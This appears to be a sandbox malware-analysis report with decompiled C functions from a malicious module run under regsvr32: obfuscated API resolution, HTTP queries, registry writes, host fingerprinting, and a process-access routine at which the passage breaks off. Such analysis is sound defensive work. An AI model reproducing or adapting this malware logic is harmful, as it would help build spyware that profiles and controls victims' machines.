                                							_v8 = 0;
                                							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                                							_t58 = E02BD1525(_v8 + 1);
                                							if(_t58 == 0) {
                                								_v12 = 8;
                                							} else {
                                								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                                									E02BD8B22(_t58);
                                									_v12 = GetLastError();
                                								} else {
                                									 *((char*)(_t58 + _v8)) = 0;
                                									 *(_t61 + 0xc) = _t58;
                                								}
                                							}
                                							goto L15;
                                						}
                                					}
                                					SetEvent( *(_t61 + 0x1c));
                                					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                					_v12 = _t56;
                                					if(_t56 != 0) {
                                						goto L15;
                                					}
                                					goto L3;
                                					L11:
                                					_t42 = E02BD29C0( *(_t61 + 0x1c), _t59, 0xea60);
                                					_v12 = _t42;
                                				} while (_t42 == 0);
                                				goto L15;
                                 			}

                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 02BD57F4
                                • SetEvent.KERNEL32(?), ref: 02BD5804
                                • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02BD5836
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02BD585B
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02BD587B
                                • GetLastError.KERNEL32 ref: 02BD588D
                                  • Part of subcall function 02BD29C0: WaitForMultipleObjects.KERNEL32(00000002,02BDA923,00000000,02BDA923,?,?,?,02BDA923,0000EA60), ref: 02BD29DB
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                • GetLastError.KERNEL32(00000000), ref: 02BD58C2
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                 • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                 • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                • String ID:
                                • API String ID: 3369646462-0
                                • Opcode ID: ee3870b638c3e37794792263448e00298343fd96bcccfada83f5702489b0b197
                                • Instruction ID: 06d961af154f9d59bc2f9b9e2e9bd31cfbb86a9f52fad85a86c28c3b441cdc6b
                                • Opcode Fuzzy Hash: ee3870b638c3e37794792263448e00298343fd96bcccfada83f5702489b0b197
                                • Instruction Fuzzy Hash: 84312EB5D40309EFDB30DFA5C8849DEBBF8EB08344F5049AAE542E6251E771AA44DF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 63%
                                			E02BD7B8D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _v8;
                                				intOrPtr _t9;
                                				intOrPtr _t13;
                                				char* _t28;
                                				void* _t33;
                                				void* _t34;
                                				char* _t36;
                                				intOrPtr* _t40;
                                				char* _t41;
                                				char* _t42;
                                				char* _t43;
                                
                                				_t34 = __edx;
                                				_push(__ecx);
                                				_t9 =  *0x2bdd2a8; // 0x242a5a8
                                				_t1 = _t9 + 0x2bde62c; // 0x253d7325
                                				_t36 = 0;
                                				_t28 = E02BDA055(__ecx, _t1);
                                				if(_t28 != 0) {
                                					_t40 = __imp__;
                                					_t13 =  *_t40(_t28);
                                					_v8 = _t13;
                                					_t41 = E02BD1525(_v8 +  *_t40(_a4) + 1);
                                					if(_t41 != 0) {
                                						strcpy(_t41, _t28);
                                						_pop(_t33);
                                						__imp__(_t41, _a4);
                                						_t36 = E02BD1188(_t34, _t41, _a8);
                                						E02BD8B22(_t41);
                                						_t42 = E02BD976F(StrTrimA(_t36, "="), _t36);
                                						if(_t42 != 0) {
                                							E02BD8B22(_t36);
                                							_t36 = _t42;
                                						}
                                						_t43 = E02BDA41C(_t36, _t33);
                                						if(_t43 != 0) {
                                							E02BD8B22(_t36);
                                							_t36 = _t43;
                                						}
                                					}
                                					E02BD8B22(_t28);
                                				}
                                				return _t36;
                                			}

                                APIs
                                  • Part of subcall function 02BDA055: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,02BD7BA7,253D7325,00000000,00000000,7691C740,?,?,02BD9DA0,?), ref: 02BDA0BC
                                  • Part of subcall function 02BDA055: sprintf.NTDLL ref: 02BDA0DD
                                • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,02BD9DA0,?,050095B0), ref: 02BD7BB8
                                • lstrlen.KERNEL32(?,?,?,02BD9DA0,?,050095B0), ref: 02BD7BC0
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • strcpy.NTDLL ref: 02BD7BD7
                                • lstrcat.KERNEL32(00000000,?), ref: 02BD7BE2
                                  • Part of subcall function 02BD1188: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02BD7BF1,00000000,?,?,?,02BD9DA0,?,050095B0), ref: 02BD119F
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02BD9DA0,?,050095B0), ref: 02BD7BFF
                                  • Part of subcall function 02BD976F: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02BD7C0B,00000000,?,?,02BD9DA0,?,050095B0), ref: 02BD9779
                                  • Part of subcall function 02BD976F: _snprintf.NTDLL ref: 02BD97D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 91b21593c5eaf42809b58894cdd106206296e5f051d33fd925f3a0faf3d371e4
                                • Instruction ID: 4706b7bae7a735091ce789224bbeac91be5fd4db4896e57d973e8e626945e8bd
                                • Opcode Fuzzy Hash: 91b21593c5eaf42809b58894cdd106206296e5f051d33fd925f3a0faf3d371e4
                                • Instruction Fuzzy Hash: 4011A3779015257B47127BB89C44CEEBAAEDF487543090595F904EB100FF35D9029BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 02BD94A4
                                • SysAllocString.OLEAUT32(0070006F), ref: 02BD94B8
                                • SysAllocString.OLEAUT32(00000000), ref: 02BD94CA
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD9532
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD9541
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD954C
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 40e8d7cc1f6a1efb3639734d834195d99be372c2a8c9fb6b84bab36595523337
                                • Instruction ID: 72287c7eb78b3c03414ce60ed45ea760902bf2af766af7bc5550e7b321a75340
                                • Opcode Fuzzy Hash: 40e8d7cc1f6a1efb3639734d834195d99be372c2a8c9fb6b84bab36595523337
                                • Instruction Fuzzy Hash: 24415F36D00A09AFDB01DFF8D844AEEB7BAEF49304F144466E914EB211EB71DA05CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02BD4944(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                				intOrPtr _v8;
                                				intOrPtr _t23;
                                				intOrPtr _t26;
                                				_Unknown_base(*)()* _t28;
                                				intOrPtr _t30;
                                				_Unknown_base(*)()* _t32;
                                				intOrPtr _t33;
                                				_Unknown_base(*)()* _t35;
                                				intOrPtr _t36;
                                				_Unknown_base(*)()* _t38;
                                				intOrPtr _t39;
                                				_Unknown_base(*)()* _t41;
                                				intOrPtr _t44;
                                				struct HINSTANCE__* _t48;
                                				intOrPtr _t54;
                                
                                				_t54 = E02BD1525(0x20);
                                				if(_t54 == 0) {
                                					_v8 = 8;
                                				} else {
                                					_t23 =  *0x2bdd2a8; // 0x242a5a8
                                					_t1 = _t23 + 0x2bde11a; // 0x4c44544e
                                					_t48 = GetModuleHandleA(_t1);
                                					_t26 =  *0x2bdd2a8; // 0x242a5a8
                                					_t2 = _t26 + 0x2bde769; // 0x7243775a
                                					_v8 = 0x7f;
                                					_t28 = GetProcAddress(_t48, _t2);
                                					 *(_t54 + 0xc) = _t28;
                                					if(_t28 == 0) {
                                						L8:
                                						E02BD8B22(_t54);
                                					} else {
                                						_t30 =  *0x2bdd2a8; // 0x242a5a8
                                						_t5 = _t30 + 0x2bde756; // 0x614d775a
                                						_t32 = GetProcAddress(_t48, _t5);
                                						 *(_t54 + 0x10) = _t32;
                                						if(_t32 == 0) {
                                							goto L8;
                                						} else {
                                							_t33 =  *0x2bdd2a8; // 0x242a5a8
                                							_t7 = _t33 + 0x2bde40b; // 0x6e55775a
                                							_t35 = GetProcAddress(_t48, _t7);
                                							 *(_t54 + 0x14) = _t35;
                                							if(_t35 == 0) {
                                								goto L8;
                                							} else {
                                								_t36 =  *0x2bdd2a8; // 0x242a5a8
                                								_t9 = _t36 + 0x2bde4d2; // 0x4e6c7452
                                								_t38 = GetProcAddress(_t48, _t9);
                                								 *(_t54 + 0x18) = _t38;
                                								if(_t38 == 0) {
                                									goto L8;
                                								} else {
                                									_t39 =  *0x2bdd2a8; // 0x242a5a8
                                									_t11 = _t39 + 0x2bde779; // 0x6c43775a
                                									_t41 = GetProcAddress(_t48, _t11);
                                									 *(_t54 + 0x1c) = _t41;
                                									if(_t41 == 0) {
                                										goto L8;
                                									} else {
                                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                										_t44 = E02BD5CD1(_t54, _a8);
                                										_v8 = _t44;
                                										if(_t44 != 0) {
                                											goto L8;
                                										} else {
                                											 *_a12 = _t54;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v8;
                                			}

                                APIs
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02BD34A1,?,00000001,?,?,00000000,00000000), ref: 02BD4969
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 02BD498B
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 02BD49A1
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02BD49B7
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02BD49CD
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02BD49E3
                                  • Part of subcall function 02BD5CD1: memset.NTDLL ref: 02BD5D50
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: 3c530e5eb2519b141382a7239d55d9cce332c14f002ebf222fa46ff3f210e2f7
                                • Instruction ID: a4f8f88c40c5b722a13372c5ac160637887957dab88153d1daa7a9564747ab2c
                                • Opcode Fuzzy Hash: 3c530e5eb2519b141382a7239d55d9cce332c14f002ebf222fa46ff3f210e2f7
                                • Instruction Fuzzy Hash: 33217AB164160AAFD710EF69DC84EDAB7FCEF083447020466E955DB220FB30EA04CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 88%
                                			E02BD4B2A(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                				signed int _v8;
                                				char _v12;
                                				signed int* _v16;
                                				char _v284;
                                				void* __esi;
                                				char* _t59;
                                				intOrPtr* _t60;
                                				intOrPtr _t64;
                                				char _t65;
                                				intOrPtr _t68;
                                				intOrPtr _t69;
                                				intOrPtr _t71;
                                				void* _t73;
                                				signed int _t81;
                                				void* _t91;
                                				void* _t92;
                                				char _t98;
                                				signed int* _t100;
                                				intOrPtr* _t101;
                                				void* _t102;
                                
                                				_t92 = __ecx;
                                				_v8 = _v8 & 0x00000000;
                                				_t98 = _a16;
                                				if(_t98 == 0) {
                                					__imp__( &_v284,  *0x2bdd33c);
                                					_t91 = 0x80000002;
                                					L6:
                                					_t59 = E02BD7B3B( &_v284,  &_v284);
                                					_a8 = _t59;
                                					if(_t59 == 0) {
                                						_v8 = 8;
                                						L29:
                                						_t60 = _a20;
                                						if(_t60 != 0) {
                                							 *_t60 =  *_t60 + 1;
                                						}
                                						return _v8;
                                					}
                                					_t101 = _a24;
                                					if(E02BD8C52(_t92, _t97, _t101, _t91, _t59) != 0) {
                                						L27:
                                						E02BD8B22(_a8);
                                						goto L29;
                                					}
                                					_t64 =  *0x2bdd278; // 0x5009d18
                                					_t16 = _t64 + 0xc; // 0x5009e3a
                                					_t65 = E02BD7B3B(_t64,  *_t16);
                                					_a24 = _t65;
                                					if(_t65 == 0) {
                                						L14:
                                						_t29 = _t101 + 0x14; // 0x102
                                						_t33 = _t101 + 0x10; // 0x3d02bdc0
                                						if(E02BDA38F(_t97,  *_t33, _t91, _a8,  *0x2bdd334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                							_t68 =  *0x2bdd2a8; // 0x242a5a8
                                							if(_t98 == 0) {
                                								_t35 = _t68 + 0x2bdea3f; // 0x4d4c4b48
                                								_t69 = _t35;
                                							} else {
                                								_t34 = _t68 + 0x2bde8e7; // 0x55434b48
                                								_t69 = _t34;
                                							}
                                							if(E02BD8F85(_t69,  *0x2bdd334,  *0x2bdd338,  &_a24,  &_a16) == 0) {
                                								if(_t98 == 0) {
                                									_t71 =  *0x2bdd2a8; // 0x242a5a8
                                									_t44 = _t71 + 0x2bde846; // 0x74666f53
                                									_t73 = E02BD7B3B(_t44, _t44);
                                									_t99 = _t73;
                                									if(_t73 == 0) {
                                										_v8 = 8;
                                									} else {
                                										_t47 = _t101 + 0x10; // 0x3d02bdc0
                                										E02BD4538( *_t47, _t91, _a8,  *0x2bdd338, _a24);
                                										_t49 = _t101 + 0x10; // 0x3d02bdc0
                                										E02BD4538( *_t49, _t91, _t99,  *0x2bdd330, _a16);
                                										E02BD8B22(_t99);
                                									}
                                								} else {
                                									_t40 = _t101 + 0x10; // 0x3d02bdc0
                                									E02BD4538( *_t40, _t91, _a8,  *0x2bdd338, _a24);
                                									_t43 = _t101 + 0x10; // 0x3d02bdc0
                                									E02BD4538( *_t43, _t91, _a8,  *0x2bdd330, _a16);
                                								}
                                								if( *_t101 != 0) {
                                									E02BD8B22(_a24);
                                								} else {
                                									 *_t101 = _a16;
                                								}
                                							}
                                						}
                                						goto L27;
                                					}
                                					_t21 = _t101 + 0x10; // 0x3d02bdc0
                                					_t81 = E02BD7DDD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                					if(_t81 == 0) {
                                						_t100 = _v16;
                                						if(_v12 == 0x28) {
                                							 *_t100 =  *_t100 & _t81;
                                							_t26 = _t101 + 0x10; // 0x3d02bdc0
                                							E02BDA38F(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                						}
                                						E02BD8B22(_t100);
                                						_t98 = _a16;
                                					}
                                					E02BD8B22(_a24);
                                					goto L14;
                                				}
                                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                					goto L29;
                                				} else {
                                					_t97 = _a8;
                                					E02BDA789(_t98, _a8,  &_v284);
                                					__imp__(_t102 + _t98 - 0x117,  *0x2bdd33c);
                                					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                					_t91 = 0x80000003;
                                					goto L6;
                                				}
                                			}

                                APIs
                                • StrChrA.SHLWAPI(02BD9900,0000005F,00000000,00000000,00000104), ref: 02BD4B5D
                                • lstrcpy.KERNEL32(?,?), ref: 02BD4B8A
                                  • Part of subcall function 02BD7B3B: lstrlen.KERNEL32(?,00000000,05009D18,00000000,02BD5142,05009F3B,?,?,?,?,?,69B25F44,00000005,02BDD00C), ref: 02BD7B42
                                  • Part of subcall function 02BD7B3B: mbstowcs.NTDLL ref: 02BD7B6B
                                  • Part of subcall function 02BD7B3B: memset.NTDLL ref: 02BD7B7D
                                  • Part of subcall function 02BD4538: lstrlenW.KERNEL32(?,?,?,02BD4CF3,3D02BDC0,80000002,02BD9900,02BD5C8D,74666F53,4D4C4B48,02BD5C8D,?,3D02BDC0,80000002,02BD9900,?), ref: 02BD455D
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                • lstrcpy.KERNEL32(?,00000000), ref: 02BD4BAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: 2981e9fca3b65644ba144a94ebad2bc5536a25cde3e272beb781589c0269093d
                                • Instruction ID: 2910885585b9e52012b4b604764df175029249f1bf69deba6f4d9e4ade48ea7b
                                • Opcode Fuzzy Hash: 2981e9fca3b65644ba144a94ebad2bc5536a25cde3e272beb781589c0269093d
                                • Instruction Fuzzy Hash: D451497250060ABFDF21AFA0DD84EEA7BBAEB04355F008994F95597160F732D926DF20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			// Swaps the buffer pointer held in slot 0 of the global object at 0x2bdd32c
                                			// under that object's critical section (slot 0x10; the two __imp__ calls are
                                			// RtlEnterCriticalSection / RtlLeaveCriticalSection per the APIs list below).
                                			// It first spins in 10 ms sleeps until the in-use counter in slot 0x16 reads
                                			// zero, then frees the previous buffer unless it is NULL or the static buffer
                                			// inside the module image at 0x2bde81a. _v0 is the new pointer; the decompiler
                                			// could not resolve where it comes from (quality 37%).
                                			E02BD9FF6() {
                                				void* _v0;
                                				void** _t3;
                                				void** _t5;
                                				void** _t7;
                                				void** _t8;
                                				void* _t10;
                                
                                				_t3 =  *0x2bdd32c; // 0x50095b0
                                				__imp__( &(_t3[0x10])); // RtlEnterCriticalSection(&obj[0x10])
                                				while(1) {
                                					_t5 =  *0x2bdd32c; // 0x50095b0
                                					_t1 =  &(_t5[0x16]); // 0x0
                                					if( *_t1 == 0) { // no user of the current buffer remains
                                						break;
                                					}
                                					Sleep(0xa); // 10 ms back-off, then re-check
                                				}
                                				_t7 =  *0x2bdd32c; // 0x50095b0
                                				_t10 =  *_t7;
                                				if(_t10 != 0 && _t10 != 0x2bde81a) { // never free the built-in default buffer
                                					HeapFree( *0x2bdd238, 0, _t10); // *0x2bdd238 is the heap handle
                                					_t7 =  *0x2bdd32c; // 0x50095b0
                                				}
                                				 *_t7 = _v0; // publish the new buffer
                                				_t8 =  &(_t7[0x10]);
                                				__imp__(_t8); // RtlLeaveCriticalSection(&obj[0x10])
                                				return _t8;
                                			}
                                
                                Instruction addresses for the C-code lines above, in order (0x00000000 = no address): 0x02bd9ff6 0x02bd9fff 0x02bda00f 0x02bda00f 0x02bda014 0x02bda019 0x00000000 0x00000000 0x02bda009 0x02bda009 0x02bda01b 0x02bda020 0x02bda024 0x02bda037 0x02bda03d 0x02bda03d 0x02bda046 0x02bda048 0x02bda04c 0x02bda052

                                APIs
                                • RtlEnterCriticalSection.NTDLL(05009570), ref: 02BD9FFF
                                • Sleep.KERNEL32(0000000A,?,02BD30F3), ref: 02BDA009
                                • HeapFree.KERNEL32(00000000,?,?,02BD30F3), ref: 02BDA037
                                • RtlLeaveCriticalSection.NTDLL(05009570), ref: 02BDA04C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
                                • Opcode ID: 4940f60a274c4e3b2808ac967f0d7875410168b6eb6e5aa82b9b0eee82a94b52
                                • Instruction ID: 899f999bf242c0aa0633f3b1f28c6afddcb11b65c2c5d3e07c122dc3b59d75ab
                                • Opcode Fuzzy Hash: 4940f60a274c4e3b2808ac967f0d7875410168b6eb6e5aa82b9b0eee82a94b52
                                • Instruction Fuzzy Hash: B1F0F875E821029FE7189F68D869FA57BE4EB0C394B848899F942DB350F734EC20CE15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			// Builds the host identifier "<user>@<computer>" as UTF-8 (code page
                                			// 0xfde9 = CP_UTF8). Two probe calls with a NULL buffer obtain the required
                                			// character counts, one heap block of 4 * (user + computer + 2) bytes is
                                			// allocated through E02BD1525 (RtlAllocateHeap wrapper, see the APIs list
                                			// below), the UTF-16 scratch copy is written into the upper half (_t67), the
                                			// NUL that GetUserNameW writes is overwritten with '@' (0x40), GetComputerNameW
                                			// appends after it, and WideCharToMultiByte converts into the lower half
                                			// (_t64). Returns the UTF-8 string, or 0 on any failure (the block is then
                                			// released through E02BD8B22, the RtlFreeHeap wrapper).
                                			E02BD9267() {
                                				long _v8;
                                				long _v12;
                                				int _v16;
                                				long _t39;
                                				long _t43;
                                				signed int _t47;
                                				short _t51;
                                				signed int _t52;
                                				int _t56;
                                				int _t57;
                                				char* _t64;
                                				short* _t67;
                                
                                				_v16 = 0;
                                				_v8 = 0;
                                				GetUserNameW(0,  &_v8); // probe: _v8 receives the required length incl. NUL
                                				_t39 = _v8;
                                				if(_t39 != 0) {
                                					_v12 = _t39;
                                					_v8 = 0;
                                					GetComputerNameW(0,  &_v8); // probe: required length of the computer name
                                					_t43 = _v8;
                                					if(_t43 != 0) {
                                						_v12 = _v12 + _t43 + 2;
                                						_t64 = E02BD1525(_v12 + _t43 + 2 << 2); // (chars) << 2 = 4 bytes per character
                                						if(_t64 != 0) {
                                							_t47 = _v12;
                                							_t67 = _t64 + _t47 * 2; // UTF-16 scratch area in the upper half of the block
                                							_v8 = _t47;
                                							if(GetUserNameW(_t67,  &_v8) == 0) {
                                								L7:
                                								E02BD8B22(_t64); // failure path: free the block, return 0
                                							} else {
                                								_t51 = 0x40;
                                								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51; // replace the NUL after the user name with '@'
                                								_t52 = _v8;
                                								_v12 = _v12 - _t52;
                                								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) { // append the computer name after '@'
                                									goto L7;
                                								} else {
                                									_t56 = _v12 + _v8; // total UTF-16 characters: user + '@' + computer
                                									_t31 = _t56 + 2; // 0x2bd9cb2
                                									_v12 = _t56;
                                									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0); // CP_UTF8, into the lower half
                                									_v8 = _t57;
                                									if(_t57 == 0) {
                                										goto L7;
                                									} else {
                                										_t64[_t57] = 0; // NUL-terminate the UTF-8 result
                                										_v16 = _t64;
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v16;
                                			}
                                
                                Instruction addresses for the C-code lines above, in order (0x00000000 = no address): 0x02bd9275 0x02bd9278 0x02bd927b 0x02bd9281 0x02bd9286 0x02bd928c 0x02bd9294 0x02bd9297 0x02bd929d 0x02bd92a2 0x02bd92af 0x02bd92bc 0x02bd92c0 0x02bd92c2 0x02bd92c6 0x02bd92c9 0x02bd92d9 0x02bd932c 0x02bd932d 0x02bd92db 0x02bd92e0 0x02bd92e1 0x02bd92e6 0x02bd92e9 0x02bd92fc 0x00000000 0x02bd92fe 0x02bd9301 0x02bd9306 0x02bd9314 0x02bd9317 0x02bd931d 0x02bd9322 0x00000000 0x02bd9324 0x02bd9324 0x02bd9327 0x02bd9327 0x02bd9322 0x02bd92fc 0x02bd9332 0x02bd9333 0x02bd92a2 0x02bd9339

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,02BD9CB0), ref: 02BD927B
                                • GetComputerNameW.KERNEL32(00000000,02BD9CB0), ref: 02BD9297
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • GetUserNameW.ADVAPI32(00000000,02BD9CB0), ref: 02BD92D1
                                • GetComputerNameW.KERNEL32(02BD9CB0,?), ref: 02BD92F4
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02BD9CB0,00000000,02BD9CB2,00000000,00000000,?,?,02BD9CB0), ref: 02BD9317
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                • String ID:
                                • API String ID: 3850880919-0
                                • Opcode ID: 7715f187d52312790cf8256231d6b5ef497e4d531346ae7f5ee014b3d860516e
                                • Instruction ID: de7f505d66335dd23a0b4da7751ca1e341a7234549aed68e62e052f773a54f15
                                • Opcode Fuzzy Hash: 7715f187d52312790cf8256231d6b5ef497e4d531346ae7f5ee014b3d860516e
                                • Instruction Fuzzy Hash: 4821D5B6D01608FFCB11DFE8D9849EEBBBDEF44244B9084AAE502E7241E7309B45DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			// Per-process initialisation. Creates a manual-reset event (stored at
                                			// 0x2bdd26c; on failure the Win32 error code is returned), records the raw
                                			// GetVersion() DWORD at 0x2bdd25c, the PID at 0x2bdd258 and the caller's
                                			// argument at 0x2bdd264, then opens its own process with access mask
                                			// 0x10047a = SYNCHRONIZE | PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE |
                                			// PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_VM_OPERATION |
                                			// PROCESS_CREATE_THREAD and stores the handle at 0x2bdd254, falling back to
                                			// the pseudo-handle -1 (GetCurrentProcess()) when OpenProcess fails.
                                			// The version test is mangled by the decompiler (_t15 = _t4 - _t4 is always 0);
                                			// the intent appears to be that a 5.0 (Windows 2000) version is refused with
                                			// 0x32 = ERROR_NOT_SUPPORTED.
                                			E02BD9EBB(intOrPtr _a4) {
                                				void* _t2;
                                				unsigned int _t4;
                                				void* _t5;
                                				long _t6;
                                				void* _t7;
                                				void* _t15;
                                
                                				_t2 = CreateEventA(0, 1, 0, 0); // manual-reset, initially non-signalled
